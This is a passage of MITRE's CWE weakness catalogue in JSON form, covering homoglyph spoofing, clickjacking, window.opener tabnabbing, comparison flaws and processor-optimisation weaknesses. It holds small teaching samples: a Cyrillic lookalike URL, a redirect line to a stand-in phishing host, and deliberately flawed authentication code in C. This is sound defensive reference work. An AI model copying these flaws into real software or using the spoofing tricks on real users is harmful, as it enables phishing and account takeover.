non-Latin characters in email addresses or in links contained within emails. This helps prevent homoglyph attacks by flagging these emails and redirecting them to a user\'s spam folder."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following looks like a simple, trusted URL that a user may frequently access.","Example_Code":{"attr":{"@_Nature":"attack"},"xhtml:div":"http://www.\u0435x\u0430m\u0440l\u0435.\u0441\u043em"},"Body_Text":"However, the URL above is comprised of Cyrillic characters that look identical to the expected ASCII characters. This results in most users not being able to distinguish between the two and assuming that the above URL is trusted and safe. The \\"e\\" is actually the \\"CYRILLIC SMALL LETTER IE\\" which is represented in HTML as the character &amp;#x0435, while the \\"a\\" is actually the \\"CYRILLIC SMALL LETTER A\\" which is represented in HTML as the character &amp;#x0430.  The \\"p\\", \\"c\\", and \\"o\\" are also Cyrillic characters in this example. Viewing the source reveals a URL of \\"http://www.&amp;#x0435;x&amp;#x0430;m&amp;#x0440;l&amp;#x0435;.&amp;#x0441;&amp;#x043e;m\\". An adversary can utilize this approach to perform an attack such as a phishing attack in order to drive traffic to a malicious website."},{"Intro_Text":"The following displays an example of how creating usernames containing homoglyphs can lead to log forgery.","Body_Text":["Assume an adversary visits a legitimate, trusted domain and creates the account \\"admin\\" where the \'a\' and \'i\' characters are Cyrillic characters instead of the expected ACII. Any actions the adversary performs will be saved to the log file and look like they came from a legitimate administrator account.","However, upon closer inspection, the account that generated these log entries is \\"&amp;#x0430;dm&amp;#x0456;n\\". This makes it more difficult to determine which actions were performed by the adversary and which actions were executed by the legitimate \\"admin\\" account."],"Example_Code":{"attr":{"@_Nature":"result"},"xhtml:div":{"#text":"123.123.123.123 \u0430dm\u0456n [17/Jul/2017:09:05:49 -0400] \\"GET /example/users/userlist HTTP/1.1\\" 401 12846123.123.123.123 \u0430dm\u0456n [17/Jul/2017:09:06:51 -0400] \\"GET /example/users/userlist HTTP/1.1\\" 200 4523123.123.123.123 \u0430dm\u0456n [17/Jul/2017:09:10:02 -0400] \\"GET /example/users/editusers HTTP/1.1\\" 200 6291123.123.123.123 \u0430dm\u0456n [17/Jul/2017:09:10:02 -0400] \\"GET /example/users/editusers HTTP/1.1\\" 200 6291123.123.123.123 \u0430dm\u0456n [17/Jul/2017:09:10:02 -0400] \\"GET /example/users/editusers HTTP/1.1\\" 200 6291123.123.123.123 \u0430dm\u0456n [17/Jul/2017:09:10:02 -0400] \\"GET /example/users/editusers HTTP/1.1\\" 200 6291","xhtml:br":["","","","",""]}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2013-7236","Description":"web forum allows impersonation of users with homoglyphs in account names","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7236"},{"Reference":"CVE-2012-0584","Description":"Improper character restriction in URLs in web browser","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0584"},{"Reference":"CVE-2009-0652","Description":"Incomplete denylist does not include homoglyphs of \\"/\\" and \\"?\\" characters in URLs","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0652"},{"Reference":"CVE-2017-5015","Description":"web browser does not convert hyphens to punycode, allowing IDN spoofing in URLs","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5015"},{"Reference":"CVE-2005-0233","Description":"homoglyph spoofing using punycode in URLs and certificates","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0233"},{"Reference":"CVE-2005-0234","Description":"homoglyph spoofing using punycode in URLs and certificates","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0234"},{"Reference":"CVE-2005-0235","Description":"homoglyph spoofing using punycode in URLs and certificates","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0235"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 11, &#34;Canonical Representation Issues&#34;, Page 382"}},{"attr":{"@_External_Reference_ID":"REF-8"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2017-07-24"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Demonstrative_Examples, Description, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Demonstrative_Examples, Description, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples"}]}},"1021":{"attr":{"@_ID":"1021","@_Name":"Improper Restriction of Rendered UI Layers or Frames","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The web application does not restrict or incorrectly restricts frame objects or UI layers that belong to another application or domain, which can lead to user confusion about which interface the user is interacting with.","Extended_Description":"A web application is expected to place restrictions on whether it is allowed to be rendered within frames, iframes, objects, embed or applet elements. Without the restrictions, users can be tricked into interacting with the application when they were not intending to.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"441","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"451","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Clickjacking"},{"Term":"UI Redress Attack"},{"Term":"Tapjacking","Description":"\\"Tapjacking\\" is similar to clickjacking, except it is used for mobile applications in which the user \\"taps\\" the application instead of performing a mouse click."}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism","Read Application Data","Modify Application Data"],"Note":"An attacker can trick a user into performing actions that are masked and hidden from the user\'s view. The impact varies widely, depending on the functionality of the underlying application. For example, in a social media application, clickjacking could be used to trik the user into changing privacy settings."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":{"xhtml:p":["The use of X-Frame-Options allows developers of web content to restrict the usage of their application within the form of overlays, frames, or iFrames. The developer can indicate from which domains can frame the content.","The concept of X-Frame-Options is well documented, but implementation of this protection mechanism is in development to cover gaps. There is a need for allowing frames from multiple domains."]}},{"Phase":"Implementation","Description":{"xhtml:p":["A developer can use a \\"frame-breaker\\" script in each page that should not be framed. This is very helpful for legacy browsers that do not support X-Frame-Options security feature previously mentioned.","It is also important to note that this tactic has been circumvented or bypassed. Improper usage of frames can persist in the web application through nested frames. The \\"frame-breaking\\" script does not intuitively account for multiple nested frames that can be presented to the user."]}},{"Phase":"Implementation","Description":"This defense-in-depth technique can be used to prevent the improper usage of frames in web applications. It prioritizes the valid sources of data to be loaded into the application through the usage of declarative policies. Based on which implementation of Content Security Policy is in use, the developer should use the \\"frame-ancestors\\" directive or the \\"frame-src\\" directive to mitigate this weakness. Both directives allow for the placement of restrictions when it comes to allowing embedded content."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2017-7440","Description":"E-mail preview feature in a desktop application allows clickjacking attacks via a crafted e-mail message","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7440"},{"Reference":"CVE-2017-5697","Description":"Hardware/firmware product has insufficient clickjacking protection in its web user interface","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5697"},{"Reference":"CVE-2017-4015","Description":"Clickjacking in data-loss prevention product via HTTP response header.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-4015"},{"Reference":"CVE-2016-2496","Description":"Tapjacking in permission dialog for mobile OS allows access of private storage using a partially-overlapping window.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2496"},{"Reference":"CVE-2015-1241","Description":"Tapjacking in web browser related to page navigation and touch/gesture events.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1241"},{"Reference":"CVE-2017-0492","Description":"System UI in mobile OS allows a malicious application to create a UI overlay of the entire screen to gain privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0492"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"103"}},{"attr":{"@_CAPEC_ID":"181"}},{"attr":{"@_CAPEC_ID":"222"}},{"attr":{"@_CAPEC_ID":"504"}},{"attr":{"@_CAPEC_ID":"506"}},{"attr":{"@_CAPEC_ID":"654"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-35"}},{"attr":{"@_External_Reference_ID":"REF-36"}},{"attr":{"@_External_Reference_ID":"REF-37"}},{"attr":{"@_External_Reference_ID":"REF-38"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2017-08-01"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1022":{"attr":{"@_ID":"1022","@_Name":"Use of Web Link to Untrusted Target with window.opener Access","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The web application produces links to untrusted external sites outside of its sphere of control, but it does not properly prevent the external site from modifying  security-critical properties of the window.opener object, such as the location property.","Extended_Description":"When a user clicks a link to an external site (\\"target\\"), the target=\\"_blank\\" attribute causes the target site\'s contents to be opened in a new window or tab, which runs in the same process as the original page. The window.opener object records information about the original page that offered the link.  If an attacker can run script on the target page, then they could read or modify certain properties of the window.opener object, including the location property - even if the original and target site are not the same origin.  An attacker can modify the location property to automatically redirect the user to a malicious site, e.g. as part of a phishing attack. Since this redirect happens in the original window/tab - which is not necessarily visible, since the browser is focusing the display on the new target page - the user might not notice any suspicious redirection.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"266","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"JavaScript","@_Prevalence":"Often"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Often"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"tabnabbing"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This weakness is introduced during the design of an application when the architect does not specify that a linked external document should not be able to alter the location of the calling page."},{"Phase":"Implementation","Note":"This weakness is introduced during the coding of an application when the developer does not include the noopener and/or noreferrer value for the rel attribute."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Alter Execution Logic","Note":"The user may be redirected to an untrusted page that contains undesired content or malicious script code."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Specify in the design that any linked external document must not be granted access to the location object of the calling page."},{"Phase":"Implementation","Description":{"xhtml:p":["When creating a link to an external document using the &lt;a&gt; tag with a defined target, for example \\"_blank\\" or a named frame, provide the rel attribute with a value \\"noopener noreferrer\\".","If opening the external document in a new window via javascript, then reset the opener by setting it equal to null."]}},{"Phase":"Implementation","Description":{"xhtml:p":"Do not use \\"_blank\\" targets. However, this can affect the usability of the application."}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example, the application opens a link in a named window/tab without taking precautions to prevent the called page from tampering with the calling page\'s location in the browser.","Body_Text":["There are two ways that this weakness is commonly seen. The first is when the application generates an &lt;a&gt; tag is with target=\\"_blank\\" to point to a target site:","If the attacker offers a useful page on this link (or compromises a trusted, popular site), then a user may click on this link.  However, the attacker could use scripting code to modify the window.opener\'s location property to redirect the application to a malicious, attacker-controlled page - such as one that mimics the look and feel of the original application and convinces the user to re-enter authentication credentials, i.e. phishing:","To mitigate this type of weakness, some browsers support the \\"rel\\" attribute with a value of \\"noopener\\", which sets the window.opener object equal to null. Another option is to use the \\"rel\\" attribute with a value of \\"noreferrer\\", which in essence does the same thing.","A second way that this weakness is commonly seen is when opening a new site directly within JavaScript. In this case, a new site is opened using the window.open() function.","To mitigate this, set the window.opener object to null."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"HTML"},"xhtml:div":"&lt;a href=\\"http://attacker-site.example.com/useful-page.html\\" target=\\"_blank\\"&gt;"},{"attr":{"@_Nature":"attack","@_Language":"JavaScript"},"xhtml:div":"window.opener.location = \'http://phishing.example.org/popular-bank-page\';"},{"attr":{"@_Nature":"good","@_Language":"HTML"},"xhtml:div":"&lt;a href=\\"http://attacker-site.example.com/useful-page.html\\" target=\\"_blank\\" rel=\\"noopener noreferrer\\"&gt;"},{"attr":{"@_Nature":"bad","@_Language":"JavaScript"},"xhtml:div":"var newWindow = window.open(\\"http://attacker-site.example.com/useful-page.html\\", \\"_blank\\");"},{"attr":{"@_Nature":"good","@_Language":"JavaScript"},"xhtml:div":{"#text":"var newWindow = window.open(\\"http://attacker-site.example.com/useful-page.html\\", \\"_blank\\");newWindow.opener = null;","xhtml:br":""}}]}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-39"}},{"attr":{"@_External_Reference_ID":"REF-40"}},{"attr":{"@_External_Reference_ID":"REF-958"}}]},"Content_History":{"Submission":{"Submission_Name":"David Deatherage","Submission_Organization":"Silicon Valley Bank","Submission_Date":"2017-09-26"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Alternate_Terms, Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Improper Restriction of Cross-Origin Permission to window.opener.location","attr":{"@_Date":"2018-03-27"}}}},"1023":{"attr":{"@_ID":"1023","@_Name":"Incomplete Comparison with Missing Factors","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software performs a comparison between entities that must consider multiple factors or characteristics of each entity, but the comparison does not include one or more of these factors.","Extended_Description":"An incomplete comparison can lead to resultant weaknesses, e.g., by operating on the wrong object or making a security decision without considering a required factor.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"697","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Access Control"],"Impact":["Alter Execution Logic","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Thoroughly test the comparison scheme before deploying code into production. Perform positive testing as well as negative testing."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-115"},"Intro_Text":"Consider an application in which Truck objects are defined to be the same if they have the same make, the same model, and were manufactured in the same year.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class Truck {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private String make;private String model;private int year;public boolean equals(Object o) {}","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (o == null) return false;if (o == this) return true;if (!(o instanceof Truck)) return false;Truck t = (Truck) o;return (this.make.equals(t.getMake()) &amp;&amp; this.model.equals(t.getModel()));","xhtml:br":["","","","","",""]}}}}}},"Body_Text":"Here, the equals() method only checks the make and model of the Truck objects, but the year of manufacture is not included."},{"attr":{"@_Demonstrative_Example_ID":"DX-116"},"Intro_Text":"This example defines a fixed username and password. The AuthenticateUser() function is intended to accept a username and a password from an untrusted user, and check to ensure that it matches the username and password. If the username and password match, AuthenticateUser() is intended to indicate that authentication succeeded.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char *username = \\"admin\\";char *pass = \\"password\\";int AuthenticateUser(char *inUser, char *inPass) {}int main (int argc, char **argv) {}","xhtml:i":"/* Ignore CWE-259 (hard-coded password) and CWE-309 (use of password system for authentication) for this example. */","xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"if (strncmp(username, inUser, strlen(inUser))) {}if (! strncmp(pass, inPass, strlen(inPass))) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"logEvent(\\"Auth failure of username using strlen of inUser\\");return(AUTH_FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"logEvent(\\"Auth success of password using strlen of inUser\\");return(AUTH_SUCCESS);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"logEvent(\\"Auth fail of password using sizeof\\");return(AUTH_FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["",""]},{"#text":"int authResult;if (argc &lt; 3) {}authResult = AuthenticateUser(argv[1], argv[2]);if (authResult == AUTH_SUCCESS) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""],"xhtml:div":[{"#text":"ExitError(\\"Usage: Provide a username and password\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"DoAuthenticatedTask(argv[1]);","attr":{"@_style":"margin-left:10px;"}},{"#text":"ExitError(\\"Authentication failed\\");","attr":{"@_style":"margin-left:10px;"}}]}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"ppapaspass","xhtml:br":["","",""]}}],"Body_Text":["In AuthenticateUser(), the strncmp() call uses the string length of an attacker-provided inPass parameter in order to determine how many characters to check in the password. So, if the attacker only provides a password of length 1, the check will only examine the first byte of the application\'s password before determining success.","As a result, this partial comparison leads to improper authentication (CWE-287).","Any of these passwords would still cause authentication to succeed for the \\"admin\\" user:","This significantly reduces the search space for an attacker, making brute force attacks more feasible.","The same problem also applies to the username, so values such as \\"a\\" and \\"adm\\" will succeed for the username.","While this demonstrative example may not seem realistic, see the Observed Examples for CVE entries that effectively reflect this same weakness."]}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-01-04"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"1024":{"attr":{"@_ID":"1024","@_Name":"Comparison of Incompatible Types","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software performs a comparison between two entities, but the entities are of different, incompatible types that cannot be guaranteed to provide correct results when they are directly compared.","Extended_Description":"In languages that are strictly typed but support casting/conversion, such as C or C++, the programmer might assume that casting one entity to the same type as another entity will ensure that the comparison will be performed correctly, but this cannot be guaranteed.  In languages that are not strictly typed, such as PHP or JavaScript, there may be implicit casting/conversion to a type that the programmer is unaware of, causing unexpected results; for example, the string \\"123\\" might be converted to a number type.  See examples.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"697","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"JavaScript","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Thoroughly test the comparison scheme before deploying code into production. Perform positive testing as well as negative testing."}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-01-04"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1025":{"attr":{"@_ID":"1025","@_Name":"Comparison Using Wrong Factors","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code performs a comparison between two entities, but the comparison examines the wrong factors or characteristics of the entities, which can lead to incorrect results and resultant weaknesses.","Extended_Description":"This can lead to incorrect results and resultant weaknesses.  For example, the code might inadvertently compare references to objects, instead of the relevant contents of those objects, causing two \\"equal\\" objects to be considered unequal.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"697","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Thoroughly test the comparison scheme before deploying code into production. Perform positive testing as well as negative testing."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-60"},"Intro_Text":"In the example below, two Java String objects are declared and initialized with the same string values. An if statement is used to determine if the strings are equivalent.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String str1 = new String(\\"Hello\\");String str2 = new String(\\"Hello\\");if (str1 == str2) {}","xhtml:br":["",""],"xhtml:div":{"#text":"System.out.println(\\"str1 == str2\\");","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"if (str1.equals(str2)) {}","xhtml:div":{"#text":"System.out.println(\\"str1 equals str2\\");","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"However, the if statement will not be executed as the strings are compared using the \\"==\\" operator. For Java objects, such as String objects, the \\"==\\" operator compares object references, not object values. While the two String objects above contain the same string values, they refer to different object references, so the System.out.println statement will not be executed. To compare object values, the previous code could be modified to use the equals method:"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-01-04"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"1037":{"attr":{"@_ID":"1037","@_Name":"Processor Optimization Removal or Modification of Security-critical Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The developer builds a security-critical protection mechanism into the software, but the processor optimizes the execution of the program such that the mechanism is removed or modified.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1038","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary","Description":"This weakness does not depend on other weaknesses and is the result of choices made by the processor in executing the specified application."}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Rarely"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"Optimizations built into the design of the processor can have unintended consequences during the execution of an application."}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Bypass Protection Mechanism","Likelihood":"High","Note":"A successful exploitation of this weakness will change the order of an application\'s execution and will likely be used to bypass specific protection mechanisms. This bypass can be exploited further to potentially read data that should otherwise be unaccessible."}},"Detection_Methods":{"Detection_Method":{"Method":"White Box","Description":"In theory this weakness can be detected through the use of white box testing techniques where specifically crafted test cases are used in conjunction with debuggers to verify the order of statements being executed.","Effectiveness":"Opportunistic","Effectiveness_Notes":"Although the mentioned detection method is theoretically possible, the use of speculative execution is a preferred way of increasing processor performance. The reality is that a large number of statements are executed out of order, and determining if any of them break an access control property would be extremely opportunistic."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2017-5715","Description":"Intel, ARM, and AMD processor optimizations related to speculative execution and branch prediction cause access control checks to be bypassed when placing data into the cache. Often known as \\"Spectre\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5715"},{"Reference":"CVE-2017-5753","Description":"Intel, ARM, and AMD processor optimizations related to speculative execution and branch prediction cause access control checks to be bypassed when placing data into the cache. Often known as \\"Spectre\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5753"},{"Reference":"CVE-2017-5754","Description":"Intel processor optimizations related to speculative execution cause access control checks to be bypassed when placing data into the cache. Often known as \\"Meltdown\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5754"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"663"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-11"}},{"attr":{"@_External_Reference_ID":"REF-12"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-03-07"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1038":{"attr":{"@_ID":"1038","@_Name":"Insecure Automated Optimizations","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses a mechanism that automatically optimizes code, e.g. to improve a characteristic such as performance, but the optimizations can have an unintended side effect that might violate an intended security assumption.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"435","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"758","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary","Description":"This weakness does not depend on other weaknesses and is the result of choices made during optimization."}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"Optimizations built into the design of a product can have unintended consequences during execution."}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Alter Execution Logic","Note":"The optimizations alter the order of execution resulting in side effects that were not intended by the original developer."}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-03-07"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1039":{"attr":{"@_ID":"1039","@_Name":"Automated Recognition Mechanism with Inadequate Detection or Handling of Adversarial Input Perturbations","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product uses an automated mechanism such as machine learning to recognize complex data inputs (e.g. image or audio) as a particular concept or category, but it does not properly detect or handle inputs that have been modified or constructed in a way that causes the mechanism to detect a different, incorrect concept.","Extended_Description":{"xhtml:p":["When techniques such as machine learning are used to automatically classify input streams, and those classifications are used for security-critical decisions, then any mistake in classification can introduce a vulnerability that allows attackers to cause the product to make the wrong security decision.  If the automated mechanism is not developed or \\"trained\\" with enough input data, then attackers may be able to craft malicious input that intentionally triggers the incorrect classification.","Targeted technologies include, but are not necessarily limited to:","For example, an attacker might modify road signs or road surface markings to trick autonomous vehicles into misreading the sign/marking and performing a dangerous action."],"xhtml:ul":{"xhtml:li":["automated speech recognition","automated image recognition"]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"697","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary","Description":"This weakness does not depend on other weaknesses and is the result of choices made during optimization."}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"This issue can be introduced into the automated algorithm itself."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Bypass Protection 